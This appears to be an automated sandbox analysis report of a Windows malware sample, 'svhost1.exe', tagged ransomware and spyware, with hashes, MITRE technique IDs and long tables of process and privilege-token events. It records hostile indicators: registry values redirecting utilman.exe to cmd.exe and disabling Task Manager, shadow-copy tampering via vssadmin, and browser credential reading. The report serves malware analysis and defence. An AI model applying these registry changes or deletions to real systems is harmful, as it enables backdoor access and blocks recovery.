247ddce4c369810b27385acb97298a107ac440b70d23f047e20224dd6e68e536

Analysis

max time kernel
66s
max time network
48s
platform
windows10_x64
resource
win10v200430
submitted
09/05/2020, 18:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

svhost1.exe
Size

2.8MB
MD5

0527539f8c9af38ea8c36e9d2be595cd
SHA1

a9d38a3b10c1d3dbf5eb00024303877e3c84cdab
SHA256

247ddce4c369810b27385acb97298a107ac440b70d23f047e20224dd6e68e536
SHA512

00e01f1668c09f98643312e15044a8dc4ef38b72bb08106bd967af6f130ebaca8899e3bf22b143db49a0daf42db690b8890d10e3455804e817647e6f977242c4

Score

9^/10

ransomware evasion persistence spyware

Malware Config

Signatures

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081

Suspicious use of WriteProcessMemory 94 IoCs

description	pid	Process	procid_target
PID 664 wrote to memory of 868	664	svhost1.exe	66
PID 664 wrote to memory of 868	664	svhost1.exe	66
PID 868 wrote to memory of 1080	868	powershell.exe	70
PID 868 wrote to memory of 1080	868	powershell.exe	70
PID 664 wrote to memory of 2092	664	svhost1.exe	71
PID 664 wrote to memory of 2092	664	svhost1.exe	71
PID 2092 wrote to memory of 3712	2092	powershell.exe	73
PID 2092 wrote to memory of 3712	2092	powershell.exe	73
PID 2092 wrote to memory of 3180	2092	powershell.exe	77
PID 2092 wrote to memory of 3180	2092	powershell.exe	77
PID 2092 wrote to memory of 1872	2092	powershell.exe	78
PID 2092 wrote to memory of 1872	2092	powershell.exe	78
PID 2092 wrote to memory of 1912	2092	powershell.exe	79
PID 2092 wrote to memory of 1912	2092	powershell.exe	79
PID 2092 wrote to memory of 3528	2092	powershell.exe	80
PID 2092 wrote to memory of 3528	2092	powershell.exe	80
PID 2092 wrote to memory of 3328	2092	powershell.exe	81
PID 2092 wrote to memory of 3328	2092	powershell.exe	81
PID 2092 wrote to memory of 2272	2092	powershell.exe	82
PID 2092 wrote to memory of 2272	2092	powershell.exe	82
PID 2092 wrote to memory of 496	2092	powershell.exe	83
PID 2092 wrote to memory of 496	2092	powershell.exe	83
PID 2092 wrote to memory of 3648	2092	powershell.exe	84
PID 2092 wrote to memory of 3648	2092	powershell.exe	84
PID 2092 wrote to memory of 3800	2092	powershell.exe	85
PID 2092 wrote to memory of 3800	2092	powershell.exe	85
PID 2092 wrote to memory of 1080	2092	powershell.exe	86
PID 2092 wrote to memory of 1080	2092	powershell.exe	86
PID 2092 wrote to memory of 2860	2092	powershell.exe	87
PID 2092 wrote to memory of 2860	2092	powershell.exe	87
PID 2092 wrote to memory of 732	2092	powershell.exe	88
PID 2092 wrote to memory of 732	2092	powershell.exe	88
PID 2092 wrote to memory of 2108	2092	powershell.exe	89
PID 2092 wrote to memory of 2108	2092	powershell.exe	89
PID 2092 wrote to memory of 3552	2092	powershell.exe	90
PID 2092 wrote to memory of 3552	2092	powershell.exe	90
PID 2092 wrote to memory of 276	2092	powershell.exe	91
PID 2092 wrote to memory of 276	2092	powershell.exe	91
PID 2092 wrote to memory of 3888	2092	powershell.exe	92
PID 2092 wrote to memory of 3888	2092	powershell.exe	92
PID 2092 wrote to memory of 3540	2092	powershell.exe	93
PID 2092 wrote to memory of 3540	2092	powershell.exe	93
PID 2092 wrote to memory of 1836	2092	powershell.exe	94
PID 2092 wrote to memory of 1836	2092	powershell.exe	94
PID 2092 wrote to memory of 2252	2092	powershell.exe	95
PID 2092 wrote to memory of 2252	2092	powershell.exe	95
PID 2092 wrote to memory of 3052	2092	powershell.exe	96
PID 2092 wrote to memory of 3052	2092	powershell.exe	96
PID 2092 wrote to memory of 508	2092	powershell.exe	97
PID 2092 wrote to memory of 508	2092	powershell.exe	97
PID 2092 wrote to memory of 3996	2092	powershell.exe	98
PID 2092 wrote to memory of 3996	2092	powershell.exe	98
PID 2092 wrote to memory of 3992	2092	powershell.exe	99
PID 2092 wrote to memory of 3992	2092	powershell.exe	99
PID 2092 wrote to memory of 2220	2092	powershell.exe	100
PID 2092 wrote to memory of 2220	2092	powershell.exe	100
PID 2092 wrote to memory of 992	2092	powershell.exe	101
PID 2092 wrote to memory of 992	2092	powershell.exe	101
PID 2092 wrote to memory of 1060	2092	powershell.exe	102
PID 2092 wrote to memory of 1060	2092	powershell.exe	102
PID 2092 wrote to memory of 1800	2092	powershell.exe	103
PID 2092 wrote to memory of 1800	2092	powershell.exe	103
PID 2092 wrote to memory of 1008	2092	powershell.exe	105
PID 2092 wrote to memory of 1008	2092	powershell.exe	105
PID 2092 wrote to memory of 268	2092	powershell.exe	106
PID 2092 wrote to memory of 268	2092	powershell.exe	106
PID 2092 wrote to memory of 3848	2092	powershell.exe	107
PID 2092 wrote to memory of 3848	2092	powershell.exe	107
PID 2092 wrote to memory of 1476	2092	powershell.exe	108
PID 2092 wrote to memory of 1476	2092	powershell.exe	108
PID 2092 wrote to memory of 1872	2092	powershell.exe	109
PID 2092 wrote to memory of 1872	2092	powershell.exe	109
PID 2092 wrote to memory of 3084	2092	powershell.exe	110
PID 2092 wrote to memory of 3084	2092	powershell.exe	110
PID 2092 wrote to memory of 3132	2092	powershell.exe	111
PID 2092 wrote to memory of 3132	2092	powershell.exe	111
PID 2092 wrote to memory of 2252	2092	powershell.exe	112
PID 2092 wrote to memory of 2252	2092	powershell.exe	112
PID 2092 wrote to memory of 3444	2092	powershell.exe	113
PID 2092 wrote to memory of 3444	2092	powershell.exe	113
PID 2092 wrote to memory of 508	2092	powershell.exe	114
PID 2092 wrote to memory of 508	2092	powershell.exe	114
PID 2092 wrote to memory of 3996	2092	powershell.exe	115
PID 2092 wrote to memory of 3996	2092	powershell.exe	115
PID 2092 wrote to memory of 3992	2092	powershell.exe	116
PID 2092 wrote to memory of 3992	2092	powershell.exe	116
PID 2092 wrote to memory of 1068	2092	powershell.exe	117
PID 2092 wrote to memory of 1068	2092	powershell.exe	117
PID 2092 wrote to memory of 1252	2092	powershell.exe	118
PID 2092 wrote to memory of 1252	2092	powershell.exe	118
PID 2092 wrote to memory of 408	2092	powershell.exe	119
PID 2092 wrote to memory of 408	2092	powershell.exe	119
PID 2092 wrote to memory of 1060	2092	powershell.exe	120
PID 2092 wrote to memory of 1060	2092	powershell.exe	120

Runs net.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
3180	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
868	powershell.exe
868	powershell.exe
868	powershell.exe
2092	powershell.exe
2092	powershell.exe
2092	powershell.exe

Sets file execution options in registry 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe\Debugger = "%windir%\\system32\\cmd.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\Debugger = "Hotkey Disabled"	reg.exe

Drops desktop.ini file(s) 3 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\desktop.ini	svhost1.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	svhost1.exe
File opened for modification	C:\$Recycle.Bin\S-1-5-21-1231583446-2617009595-2137880041-1000\desktop.ini	svhost1.exe

Suspicious use of AdjustPrivilegeToken 1643 IoCs

description	pid	Process
Token: SeDebugPrivilege	868	powershell.exe
Token: SeDebugPrivilege	2092	powershell.exe
Token: SeIncreaseQuotaPrivilege	3712	WMIC.exe
Token: SeSecurityPrivilege	3712	WMIC.exe
Token: SeTakeOwnershipPrivilege	3712	WMIC.exe
Token: SeLoadDriverPrivilege	3712	WMIC.exe
Token: SeSystemProfilePrivilege	3712	WMIC.exe
Token: SeSystemtimePrivilege	3712	WMIC.exe
Token: SeProfSingleProcessPrivilege	3712	WMIC.exe
Token: SeIncBasePriorityPrivilege	3712	WMIC.exe
Token: SeCreatePagefilePrivilege	3712	WMIC.exe
Token: SeBackupPrivilege	3712	WMIC.exe
Token: SeRestorePrivilege	3712	WMIC.exe
Token: SeShutdownPrivilege	3712	WMIC.exe
Token: SeDebugPrivilege	3712	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3712	WMIC.exe
Token: SeRemoteShutdownPrivilege	3712	WMIC.exe
Token: SeUndockPrivilege	3712	WMIC.exe
Token: SeManageVolumePrivilege	3712	WMIC.exe
Token: 33	3712	WMIC.exe
Token: 34	3712	WMIC.exe
Token: 35	3712	WMIC.exe
Token: 36	3712	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3712	WMIC.exe
Token: SeSecurityPrivilege	3712	WMIC.exe
Token: SeTakeOwnershipPrivilege	3712	WMIC.exe
Token: SeLoadDriverPrivilege	3712	WMIC.exe
Token: SeSystemProfilePrivilege	3712	WMIC.exe
Token: SeSystemtimePrivilege	3712	WMIC.exe
Token: SeProfSingleProcessPrivilege	3712	WMIC.exe
Token: SeIncBasePriorityPrivilege	3712	WMIC.exe
Token: SeCreatePagefilePrivilege	3712	WMIC.exe
Token: SeBackupPrivilege	3712	WMIC.exe
Token: SeRestorePrivilege	3712	WMIC.exe
Token: SeShutdownPrivilege	3712	WMIC.exe
Token: SeDebugPrivilege	3712	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3712	WMIC.exe
Token: SeRemoteShutdownPrivilege	3712	WMIC.exe
Token: SeUndockPrivilege	3712	WMIC.exe
Token: SeManageVolumePrivilege	3712	WMIC.exe
Token: 33	3712	WMIC.exe
Token: 34	3712	WMIC.exe
Token: 35	3712	WMIC.exe
Token: 36	3712	WMIC.exe
Token: SeBackupPrivilege	3340	vssvc.exe
Token: SeRestorePrivilege	3340	vssvc.exe
Token: SeAuditPrivilege	3340	vssvc.exe
Token: SeIncreaseQuotaPrivilege	3528	WMIC.exe
Token: SeSecurityPrivilege	3528	WMIC.exe
Token: SeTakeOwnershipPrivilege	3528	WMIC.exe
Token: SeLoadDriverPrivilege	3528	WMIC.exe
Token: SeSystemProfilePrivilege	3528	WMIC.exe
Token: SeSystemtimePrivilege	3528	WMIC.exe
Token: SeProfSingleProcessPrivilege	3528	WMIC.exe
Token: SeIncBasePriorityPrivilege	3528	WMIC.exe
Token: SeCreatePagefilePrivilege	3528	WMIC.exe
Token: SeBackupPrivilege	3528	WMIC.exe
Token: SeRestorePrivilege	3528	WMIC.exe
Token: SeShutdownPrivilege	3528	WMIC.exe
Token: SeDebugPrivilege	3528	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3528	WMIC.exe
Token: SeRemoteShutdownPrivilege	3528	WMIC.exe
Token: SeUndockPrivilege	3528	WMIC.exe
Token: SeManageVolumePrivilege	3528	WMIC.exe
Token: 33	3528	WMIC.exe
Token: 34	3528	WMIC.exe
Token: 35	3528	WMIC.exe
Token: 36	3528	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3528	WMIC.exe
Token: SeSecurityPrivilege	3528	WMIC.exe
Token: SeTakeOwnershipPrivilege	3528	WMIC.exe
Token: SeLoadDriverPrivilege	3528	WMIC.exe
Token: SeSystemProfilePrivilege	3528	WMIC.exe
Token: SeSystemtimePrivilege	3528	WMIC.exe
Token: SeProfSingleProcessPrivilege	3528	WMIC.exe
Token: SeIncBasePriorityPrivilege	3528	WMIC.exe
Token: SeCreatePagefilePrivilege	3528	WMIC.exe
Token: SeBackupPrivilege	3528	WMIC.exe
Token: SeRestorePrivilege	3528	WMIC.exe
Token: SeShutdownPrivilege	3528	WMIC.exe
Token: SeDebugPrivilege	3528	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3528	WMIC.exe
Token: SeRemoteShutdownPrivilege	3528	WMIC.exe
Token: SeUndockPrivilege	3528	WMIC.exe
Token: SeManageVolumePrivilege	3528	WMIC.exe
Token: 33	3528	WMIC.exe
Token: 34	3528	WMIC.exe
Token: 35	3528	WMIC.exe
Token: 36	3528	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3328	WMIC.exe
Token: SeSecurityPrivilege	3328	WMIC.exe
Token: SeTakeOwnershipPrivilege	3328	WMIC.exe
Token: SeLoadDriverPrivilege	3328	WMIC.exe
Token: SeSystemProfilePrivilege	3328	WMIC.exe
Token: SeSystemtimePrivilege	3328	WMIC.exe
Token: SeProfSingleProcessPrivilege	3328	WMIC.exe
Token: SeIncBasePriorityPrivilege	3328	WMIC.exe
Token: SeCreatePagefilePrivilege	3328	WMIC.exe
Token: SeBackupPrivilege	3328	WMIC.exe
Token: SeRestorePrivilege	3328	WMIC.exe
Token: SeShutdownPrivilege	3328	WMIC.exe
Token: SeDebugPrivilege	3328	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3328	WMIC.exe
Token: SeRemoteShutdownPrivilege	3328	WMIC.exe
Token: SeUndockPrivilege	3328	WMIC.exe
Token: SeManageVolumePrivilege	3328	WMIC.exe
Token: 33	3328	WMIC.exe
Token: 34	3328	WMIC.exe
Token: 35	3328	WMIC.exe
Token: 36	3328	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3328	WMIC.exe
Token: SeSecurityPrivilege	3328	WMIC.exe
Token: SeTakeOwnershipPrivilege	3328	WMIC.exe
Token: SeLoadDriverPrivilege	3328	WMIC.exe
Token: SeSystemProfilePrivilege	3328	WMIC.exe
Token: SeSystemtimePrivilege	3328	WMIC.exe
Token: SeProfSingleProcessPrivilege	3328	WMIC.exe
Token: SeIncBasePriorityPrivilege	3328	WMIC.exe
Token: SeCreatePagefilePrivilege	3328	WMIC.exe
Token: SeBackupPrivilege	3328	WMIC.exe
Token: SeRestorePrivilege	3328	WMIC.exe
Token: SeShutdownPrivilege	3328	WMIC.exe
Token: SeDebugPrivilege	3328	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3328	WMIC.exe
Token: SeRemoteShutdownPrivilege	3328	WMIC.exe
Token: SeUndockPrivilege	3328	WMIC.exe
Token: SeManageVolumePrivilege	3328	WMIC.exe
Token: 33	3328	WMIC.exe
Token: 34	3328	WMIC.exe
Token: 35	3328	WMIC.exe
Token: 36	3328	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2272	WMIC.exe
Token: SeSecurityPrivilege	2272	WMIC.exe
Token: SeTakeOwnershipPrivilege	2272	WMIC.exe
Token: SeLoadDriverPrivilege	2272	WMIC.exe
Token: SeSystemProfilePrivilege	2272	WMIC.exe
Token: SeSystemtimePrivilege	2272	WMIC.exe
Token: SeProfSingleProcessPrivilege	2272	WMIC.exe
Token: SeIncBasePriorityPrivilege	2272	WMIC.exe
Token: SeCreatePagefilePrivilege	2272	WMIC.exe
Token: SeBackupPrivilege	2272	WMIC.exe
Token: SeRestorePrivilege	2272	WMIC.exe
Token: SeShutdownPrivilege	2272	WMIC.exe
Token: SeDebugPrivilege	2272	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2272	WMIC.exe
Token: SeRemoteShutdownPrivilege	2272	WMIC.exe
Token: SeUndockPrivilege	2272	WMIC.exe
Token: SeManageVolumePrivilege	2272	WMIC.exe
Token: 33	2272	WMIC.exe
Token: 34	2272	WMIC.exe
Token: 35	2272	WMIC.exe
Token: 36	2272	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2272	WMIC.exe
Token: SeSecurityPrivilege	2272	WMIC.exe
Token: SeTakeOwnershipPrivilege	2272	WMIC.exe
Token: SeLoadDriverPrivilege	2272	WMIC.exe
Token: SeSystemProfilePrivilege	2272	WMIC.exe
Token: SeSystemtimePrivilege	2272	WMIC.exe
Token: SeProfSingleProcessPrivilege	2272	WMIC.exe
Token: SeIncBasePriorityPrivilege	2272	WMIC.exe
Token: SeCreatePagefilePrivilege	2272	WMIC.exe
Token: SeBackupPrivilege	2272	WMIC.exe
Token: SeRestorePrivilege	2272	WMIC.exe
Token: SeShutdownPrivilege	2272	WMIC.exe
Token: SeDebugPrivilege	2272	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2272	WMIC.exe
Token: SeRemoteShutdownPrivilege	2272	WMIC.exe
Token: SeUndockPrivilege	2272	WMIC.exe
Token: SeManageVolumePrivilege	2272	WMIC.exe
Token: 33	2272	WMIC.exe
Token: 34	2272	WMIC.exe
Token: 35	2272	WMIC.exe
Token: 36	2272	WMIC.exe
Token: SeIncreaseQuotaPrivilege	496	WMIC.exe
Token: SeSecurityPrivilege	496	WMIC.exe
Token: SeTakeOwnershipPrivilege	496	WMIC.exe
Token: SeLoadDriverPrivilege	496	WMIC.exe
Token: SeSystemProfilePrivilege	496	WMIC.exe
Token: SeSystemtimePrivilege	496	WMIC.exe
Token: SeProfSingleProcessPrivilege	496	WMIC.exe
Token: SeIncBasePriorityPrivilege	496	WMIC.exe
Token: SeCreatePagefilePrivilege	496	WMIC.exe
Token: SeBackupPrivilege	496	WMIC.exe
Token: SeRestorePrivilege	496	WMIC.exe
Token: SeShutdownPrivilege	496	WMIC.exe
Token: SeDebugPrivilege	496	WMIC.exe
Token: SeSystemEnvironmentPrivilege	496	WMIC.exe
Token: SeRemoteShutdownPrivilege	496	WMIC.exe
Token: SeUndockPrivilege	496	WMIC.exe
Token: SeManageVolumePrivilege	496	WMIC.exe
Token: 33	496	WMIC.exe
Token: 34	496	WMIC.exe
Token: 35	496	WMIC.exe
Token: 36	496	WMIC.exe
Token: SeIncreaseQuotaPrivilege	496	WMIC.exe
Token: SeSecurityPrivilege	496	WMIC.exe
Token: SeTakeOwnershipPrivilege	496	WMIC.exe
Token: SeLoadDriverPrivilege	496	WMIC.exe
Token: SeSystemProfilePrivilege	496	WMIC.exe
Token: SeSystemtimePrivilege	496	WMIC.exe
Token: SeProfSingleProcessPrivilege	496	WMIC.exe
Token: SeIncBasePriorityPrivilege	496	WMIC.exe
Token: SeCreatePagefilePrivilege	496	WMIC.exe
Token: SeBackupPrivilege	496	WMIC.exe
Token: SeRestorePrivilege	496	WMIC.exe
Token: SeShutdownPrivilege	496	WMIC.exe
Token: SeDebugPrivilege	496	WMIC.exe
Token: SeSystemEnvironmentPrivilege	496	WMIC.exe
Token: SeRemoteShutdownPrivilege	496	WMIC.exe
Token: SeUndockPrivilege	496	WMIC.exe
Token: SeManageVolumePrivilege	496	WMIC.exe
Token: 33	496	WMIC.exe
Token: 34	496	WMIC.exe
Token: 35	496	WMIC.exe
Token: 36	496	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3648	WMIC.exe
Token: SeSecurityPrivilege	3648	WMIC.exe
Token: SeTakeOwnershipPrivilege	3648	WMIC.exe
Token: SeLoadDriverPrivilege	3648	WMIC.exe
Token: SeSystemProfilePrivilege	3648	WMIC.exe
Token: SeSystemtimePrivilege	3648	WMIC.exe
Token: SeProfSingleProcessPrivilege	3648	WMIC.exe
Token: SeIncBasePriorityPrivilege	3648	WMIC.exe
Token: SeCreatePagefilePrivilege	3648	WMIC.exe
Token: SeBackupPrivilege	3648	WMIC.exe
Token: SeRestorePrivilege	3648	WMIC.exe
Token: SeShutdownPrivilege	3648	WMIC.exe
Token: SeDebugPrivilege	3648	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3648	WMIC.exe
Token: SeRemoteShutdownPrivilege	3648	WMIC.exe
Token: SeUndockPrivilege	3648	WMIC.exe
Token: SeManageVolumePrivilege	3648	WMIC.exe
Token: 33	3648	WMIC.exe
Token: 34	3648	WMIC.exe
Token: 35	3648	WMIC.exe
Token: 36	3648	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3648	WMIC.exe
Token: SeSecurityPrivilege	3648	WMIC.exe
Token: SeTakeOwnershipPrivilege	3648	WMIC.exe
Token: SeLoadDriverPrivilege	3648	WMIC.exe
Token: SeSystemProfilePrivilege	3648	WMIC.exe
Token: SeSystemtimePrivilege	3648	WMIC.exe
Token: SeProfSingleProcessPrivilege	3648	WMIC.exe
Token: SeIncBasePriorityPrivilege	3648	WMIC.exe
Token: SeCreatePagefilePrivilege	3648	WMIC.exe
Token: SeBackupPrivilege	3648	WMIC.exe
Token: SeRestorePrivilege	3648	WMIC.exe
Token: SeShutdownPrivilege	3648	WMIC.exe
Token: SeDebugPrivilege	3648	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3648	WMIC.exe
Token: SeRemoteShutdownPrivilege	3648	WMIC.exe
Token: SeUndockPrivilege	3648	WMIC.exe
Token: SeManageVolumePrivilege	3648	WMIC.exe
Token: 33	3648	WMIC.exe
Token: 34	3648	WMIC.exe
Token: 35	3648	WMIC.exe
Token: 36	3648	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3800	WMIC.exe
Token: SeSecurityPrivilege	3800	WMIC.exe
Token: SeTakeOwnershipPrivilege	3800	WMIC.exe
Token: SeLoadDriverPrivilege	3800	WMIC.exe
Token: SeSystemProfilePrivilege	3800	WMIC.exe
Token: SeSystemtimePrivilege	3800	WMIC.exe
Token: SeProfSingleProcessPrivilege	3800	WMIC.exe
Token: SeIncBasePriorityPrivilege	3800	WMIC.exe
Token: SeCreatePagefilePrivilege	3800	WMIC.exe
Token: SeBackupPrivilege	3800	WMIC.exe
Token: SeRestorePrivilege	3800	WMIC.exe
Token: SeShutdownPrivilege	3800	WMIC.exe
Token: SeDebugPrivilege	3800	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3800	WMIC.exe
Token: SeRemoteShutdownPrivilege	3800	WMIC.exe
Token: SeUndockPrivilege	3800	WMIC.exe
Token: SeManageVolumePrivilege	3800	WMIC.exe
Token: 33	3800	WMIC.exe
Token: 34	3800	WMIC.exe
Token: 35	3800	WMIC.exe
Token: 36	3800	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3800	WMIC.exe
Token: SeSecurityPrivilege	3800	WMIC.exe
Token: SeTakeOwnershipPrivilege	3800	WMIC.exe
Token: SeLoadDriverPrivilege	3800	WMIC.exe
Token: SeSystemProfilePrivilege	3800	WMIC.exe
Token: SeSystemtimePrivilege	3800	WMIC.exe
Token: SeProfSingleProcessPrivilege	3800	WMIC.exe
Token: SeIncBasePriorityPrivilege	3800	WMIC.exe
Token: SeCreatePagefilePrivilege	3800	WMIC.exe
Token: SeBackupPrivilege	3800	WMIC.exe
Token: SeRestorePrivilege	3800	WMIC.exe
Token: SeShutdownPrivilege	3800	WMIC.exe
Token: SeDebugPrivilege	3800	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3800	WMIC.exe
Token: SeRemoteShutdownPrivilege	3800	WMIC.exe
Token: SeUndockPrivilege	3800	WMIC.exe
Token: SeManageVolumePrivilege	3800	WMIC.exe
Token: 33	3800	WMIC.exe
Token: 34	3800	WMIC.exe
Token: 35	3800	WMIC.exe
Token: 36	3800	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1080	WMIC.exe
Token: SeSecurityPrivilege	1080	WMIC.exe
Token: SeTakeOwnershipPrivilege	1080	WMIC.exe
Token: SeLoadDriverPrivilege	1080	WMIC.exe
Token: SeSystemProfilePrivilege	1080	WMIC.exe
Token: SeSystemtimePrivilege	1080	WMIC.exe
Token: SeProfSingleProcessPrivilege	1080	WMIC.exe
Token: SeIncBasePriorityPrivilege	1080	WMIC.exe
Token: SeCreatePagefilePrivilege	1080	WMIC.exe
Token: SeBackupPrivilege	1080	WMIC.exe
Token: SeRestorePrivilege	1080	WMIC.exe
Token: SeShutdownPrivilege	1080	WMIC.exe
Token: SeDebugPrivilege	1080	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1080	WMIC.exe
Token: SeRemoteShutdownPrivilege	1080	WMIC.exe
Token: SeUndockPrivilege	1080	WMIC.exe
Token: SeManageVolumePrivilege	1080	WMIC.exe
Token: 33	1080	WMIC.exe
Token: 34	1080	WMIC.exe
Token: 35	1080	WMIC.exe
Token: 36	1080	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1080	WMIC.exe
Token: SeSecurityPrivilege	1080	WMIC.exe
Token: SeTakeOwnershipPrivilege	1080	WMIC.exe
Token: SeLoadDriverPrivilege	1080	WMIC.exe
Token: SeSystemProfilePrivilege	1080	WMIC.exe
Token: SeSystemtimePrivilege	1080	WMIC.exe
Token: SeProfSingleProcessPrivilege	1080	WMIC.exe
Token: SeIncBasePriorityPrivilege	1080	WMIC.exe
Token: SeCreatePagefilePrivilege	1080	WMIC.exe
Token: SeBackupPrivilege	1080	WMIC.exe
Token: SeRestorePrivilege	1080	WMIC.exe
Token: SeShutdownPrivilege	1080	WMIC.exe
Token: SeDebugPrivilege	1080	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1080	WMIC.exe
Token: SeRemoteShutdownPrivilege	1080	WMIC.exe
Token: SeUndockPrivilege	1080	WMIC.exe
Token: SeManageVolumePrivilege	1080	WMIC.exe
Token: 33	1080	WMIC.exe
Token: 34	1080	WMIC.exe
Token: 35	1080	WMIC.exe
Token: 36	1080	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2860	WMIC.exe
Token: SeSecurityPrivilege	2860	WMIC.exe
Token: SeTakeOwnershipPrivilege	2860	WMIC.exe
Token: SeLoadDriverPrivilege	2860	WMIC.exe
Token: SeSystemProfilePrivilege	2860	WMIC.exe
Token: SeSystemtimePrivilege	2860	WMIC.exe
Token: SeProfSingleProcessPrivilege	2860	WMIC.exe
Token: SeIncBasePriorityPrivilege	2860	WMIC.exe
Token: SeCreatePagefilePrivilege	2860	WMIC.exe
Token: SeBackupPrivilege	2860	WMIC.exe
Token: SeRestorePrivilege	2860	WMIC.exe
Token: SeShutdownPrivilege	2860	WMIC.exe
Token: SeDebugPrivilege	2860	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2860	WMIC.exe
Token: SeRemoteShutdownPrivilege	2860	WMIC.exe
Token: SeUndockPrivilege	2860	WMIC.exe
Token: SeManageVolumePrivilege	2860	WMIC.exe
Token: 33	2860	WMIC.exe
Token: 34	2860	WMIC.exe
Token: 35	2860	WMIC.exe
Token: 36	2860	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2860	WMIC.exe
Token: SeSecurityPrivilege	2860	WMIC.exe
Token: SeTakeOwnershipPrivilege	2860	WMIC.exe
Token: SeLoadDriverPrivilege	2860	WMIC.exe
Token: SeSystemProfilePrivilege	2860	WMIC.exe
Token: SeSystemtimePrivilege	2860	WMIC.exe
Token: SeProfSingleProcessPrivilege	2860	WMIC.exe
Token: SeIncBasePriorityPrivilege	2860	WMIC.exe
Token: SeCreatePagefilePrivilege	2860	WMIC.exe
Token: SeBackupPrivilege	2860	WMIC.exe
Token: SeRestorePrivilege	2860	WMIC.exe
Token: SeShutdownPrivilege	2860	WMIC.exe
Token: SeDebugPrivilege	2860	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2860	WMIC.exe
Token: SeRemoteShutdownPrivilege	2860	WMIC.exe
Token: SeUndockPrivilege	2860	WMIC.exe
Token: SeManageVolumePrivilege	2860	WMIC.exe
Token: 33	2860	WMIC.exe
Token: 34	2860	WMIC.exe
Token: 35	2860	WMIC.exe
Token: 36	2860	WMIC.exe
Token: SeIncreaseQuotaPrivilege	732	WMIC.exe
Token: SeSecurityPrivilege	732	WMIC.exe
Token: SeTakeOwnershipPrivilege	732	WMIC.exe
Token: SeLoadDriverPrivilege	732	WMIC.exe
Token: SeSystemProfilePrivilege	732	WMIC.exe
Token: SeSystemtimePrivilege	732	WMIC.exe
Token: SeProfSingleProcessPrivilege	732	WMIC.exe
Token: SeIncBasePriorityPrivilege	732	WMIC.exe
Token: SeCreatePagefilePrivilege	732	WMIC.exe
Token: SeBackupPrivilege	732	WMIC.exe
Token: SeRestorePrivilege	732	WMIC.exe
Token: SeShutdownPrivilege	732	WMIC.exe
Token: SeDebugPrivilege	732	WMIC.exe
Token: SeSystemEnvironmentPrivilege	732	WMIC.exe
Token: SeRemoteShutdownPrivilege	732	WMIC.exe
Token: SeUndockPrivilege	732	WMIC.exe
Token: SeManageVolumePrivilege	732	WMIC.exe
Token: 33	732	WMIC.exe
Token: 34	732	WMIC.exe
Token: 35	732	WMIC.exe
Token: 36	732	WMIC.exe
Token: SeIncreaseQuotaPrivilege	732	WMIC.exe
Token: SeSecurityPrivilege	732	WMIC.exe
Token: SeTakeOwnershipPrivilege	732	WMIC.exe
Token: SeLoadDriverPrivilege	732	WMIC.exe
Token: SeSystemProfilePrivilege	732	WMIC.exe
Token: SeSystemtimePrivilege	732	WMIC.exe
Token: SeProfSingleProcessPrivilege	732	WMIC.exe
Token: SeIncBasePriorityPrivilege	732	WMIC.exe
Token: SeCreatePagefilePrivilege	732	WMIC.exe
Token: SeBackupPrivilege	732	WMIC.exe
Token: SeRestorePrivilege	732	WMIC.exe
Token: SeShutdownPrivilege	732	WMIC.exe
Token: SeDebugPrivilege	732	WMIC.exe
Token: SeSystemEnvironmentPrivilege	732	WMIC.exe
Token: SeRemoteShutdownPrivilege	732	WMIC.exe
Token: SeUndockPrivilege	732	WMIC.exe
Token: SeManageVolumePrivilege	732	WMIC.exe
Token: 33	732	WMIC.exe
Token: 34	732	WMIC.exe
Token: 35	732	WMIC.exe
Token: 36	732	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2108	WMIC.exe
Token: SeSecurityPrivilege	2108	WMIC.exe
Token: SeTakeOwnershipPrivilege	2108	WMIC.exe
Token: SeLoadDriverPrivilege	2108	WMIC.exe
Token: SeSystemProfilePrivilege	2108	WMIC.exe
Token: SeSystemtimePrivilege	2108	WMIC.exe
